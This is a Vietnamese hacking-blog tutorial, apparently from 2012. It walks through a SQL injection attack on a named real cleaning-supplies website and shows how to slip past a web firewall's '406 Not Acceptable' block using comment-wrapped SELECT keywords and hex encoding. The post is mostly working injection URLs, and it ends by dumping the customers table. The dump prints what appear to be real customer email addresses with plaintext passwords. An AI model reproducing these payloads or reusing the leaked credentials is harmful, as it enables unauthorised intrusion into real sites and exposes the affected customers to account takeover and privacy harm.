Trang chủ
»
SQL Injection
» [Tut] Bypass 406 SQL for Newbie
22 thg 6, 2012
[Tut] Bypass 406 SQL for Newbie
Hôm này khai mạc Euro 2012 nên mình mạo muội làm cái tut sql dạng 406 cho Newbie mong các bạn biết rồi đừng ném gạch nhuể.Site:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
4|dpdurrell@hotmail.com|preston59
3|josh@uppertech.net|eeq7322
3|josh@uppertech.net|eeq7322

Không có nhận xét nào:
Đăng nhận xét